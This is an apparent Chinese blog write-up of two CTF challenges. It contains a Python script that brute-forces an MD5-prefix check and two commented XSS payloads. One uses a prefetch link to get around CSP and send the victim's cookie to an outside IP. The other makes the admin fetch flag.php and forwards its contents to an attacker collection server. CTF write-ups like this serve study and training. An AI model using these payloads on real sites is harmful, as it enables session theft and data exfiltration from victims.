XSS_Payload样例

2017-08-09  本文已影响13人  jessica1123

1.http://202.112.51.217:33323/


Paste_Image.png
# 这个题目要先写一个脚本爆破随机码
#!/usr/bin/env python
# encoding: utf-8

import hashlib
import random
import sys
import string

def m(content):
    return hashlib.md5(content).hexdigest()

def main():
    start = sys.argv[1]
    while True:
        content = ""
        for i in range(0x04):
            content += random.choice(string.letters)
        print "[-] [%s]" % (content)
        if m(content).startswith(start):
            print "[+] Found : [%s]" % (content)
            break


if __name__ == "__main__":
    main()



#接着向输入框里面输入payload
<script>
//创造一个link标签,<link>标签的作用是请求一个资源,它会向所给的网址发送一个请求,因此我门可以在请求里发送cookie
var n0t = document.createElement("link");   
//'rel':prefetch,会执行预加载,这里用绕过CSP
n0t.setAttribute("rel", "prefetch");
//'href'是链接属性,前面的应该是XSS平台的地址,后面加上受害者的cookie,这个请求会在XSS平台上看到
n0t.setAttribute("href", "//123.207.40.26:65534/?c=" + document.cookie);
//把你创建的对象加入到受害者浏览器的文档里
document.head.appendChild(n0t);
</script>

2.http://202.112.51.217:43424/


Paste_Image.png
#这个题先尝试直接打cookie,但是发现不行。
#但看到题目说flag在flag.php里面,因此换种方式,让管理员向flag.php发送请求,再把里面的内容发送到XSS平台
//这里需要调用jQuery来实现,因此先引入jquery的库
<script src="./js/jquery.min.js"></script>

<script>
    //这里调用jquery的get方法,具体解释看图
    //data是flag.php的内容,回调函数function()自己定义
    $.get("http://202.112.51.217:43426/flag.php", function(data){
        //location函数是跳转到href,xxx应该是XSS平台的地址,这样就会给我们的XSS平台发送请求
        window.location.href="http://xxx/?="+data;
    })
</script>

jQuery教程传送门

Paste_Image.png
上一篇 下一篇

猜你喜欢

热点阅读